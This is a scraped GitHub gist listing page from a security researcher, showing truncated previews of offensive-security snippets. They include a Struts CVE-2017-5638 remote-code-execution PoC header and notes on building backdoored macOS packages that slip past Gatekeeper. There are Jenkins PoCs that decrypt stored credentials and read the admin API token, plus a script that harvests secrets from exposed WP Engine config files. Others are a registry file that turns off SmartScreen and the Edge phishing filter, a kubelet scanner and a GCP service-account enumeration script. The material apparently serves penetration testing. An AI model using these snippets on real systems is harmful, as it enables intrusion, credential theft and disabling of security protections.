Skip to content

Instantly share code, notes, and snippets.

Chris Gates carnal0wnage

Block or report user

Report or block carnal0wnage

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View CVE-2017-5638.sh
#!/bin/bash
#
# Poc
#
# ./CVE-2017-5638.sh 192.168.9.3
#
# by f0r34chb3t4 - Qui Abr 12 21:00:24 -03 2018
#
# CVE-2017-5638
# Apache Struts 2 Vulnerability Remote Code Execution
View Preparación OSCP.md
View Backdoor Notes
#Creating signed and customized backdoored macOS applications by abusing Apple Developer tools
https://medium.com/@adam.toscher/creating-signed-and-customized-backdoored-macos-applications-by-abusing-apple-developer-tools-b4cbf1a98187
Notes:
Include 1) 1Password 7.app (Gatekeeper Approved) 2) StuffIt Expander.app/Backdoor (Not Approved) in /tmp/apps. You will be allowed to run both 1) and 2) (Gatekeeper bypass)
Alternative one liner:
$ pkgbuild --root /tmp/apps --identifier com.microsoft --install-location /Applications mypackage.pkg
@carnal0wnage
carnal0wnage / decrypt.py
Created Feb 28, 2019
slightly modified https://github.com/tweksteen/jenkins-decrypt/blob/master/decrypt.py because it was throwing a bytes/string error - change is line 55
View decrypt.py
#!/usr/bin/env python3
import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
MAGIC = b"::::MAGIC::::"
@carnal0wnage
carnal0wnage / gist:fad7c95492224e609ddc47fb08ac8438
Created Feb 28, 2019
Jenkins - SECURITY-180/CVE-2015-1814 PoC
View gist:fad7c95492224e609ddc47fb08ac8438
POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken HTTP/1.1
Host: 10.0.0.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://10.0.0.160:8080/asynchPeople/
@carnal0wnage
carnal0wnage / gist:1f316c01eaa7707c3cc6497ef04857a8
Last active Feb 28, 2019
Jenkins - SECURITY-200 / CVE-2015-5323 PoC
View gist:1f316c01eaa7707c3cc6497ef04857a8
//from: https://gist.github.com/hayderimran7/dec6a655ba671fa5b3c3
import jenkins.security.*
//j.jenkins.setSecurityRealm(j.createDummySecurityRealm());
User u = User.get("admin")
ApiTokenProperty t = u.getProperty(ApiTokenProperty.class)
def token = t.getApiToken()
//token.getClass()
println "token is $token "
View wpeprivate-config.sh
#!/bin/bash
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
TARGET=$1
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)
# Pretty Colors
RESET='\033[00m'
GREEN='\033[01;32m'
View gist:ff2b86ee166f504eaac362d5dece3529
REGEDIT4
; @ECHO OFF
; CLS
; REGEDIT.EXE /S "%~f0"
; EXIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Off"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter]
"EnabledV9"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AppHost]
@carnal0wnage
carnal0wnage / kubelet-find.sh
Created Jan 8, 2019
bash script to open file of IPs and looks for unsecure k8 API (10250)
View kubelet-find.sh
for a in $(cat kube-gke.txt); do
echo $a;
curl --insecure https://$a:10250/runningpods ";
echo "";
echo "";
done
@carnal0wnage
carnal0wnage / gcp_enum.sh
Last active Oct 1, 2019
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
View gcp_enum.sh
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
project="my-projet"
space=""
echo "gcloud auth list"
gcloud auth list
echo -e "$space"
You can’t perform that action at this time.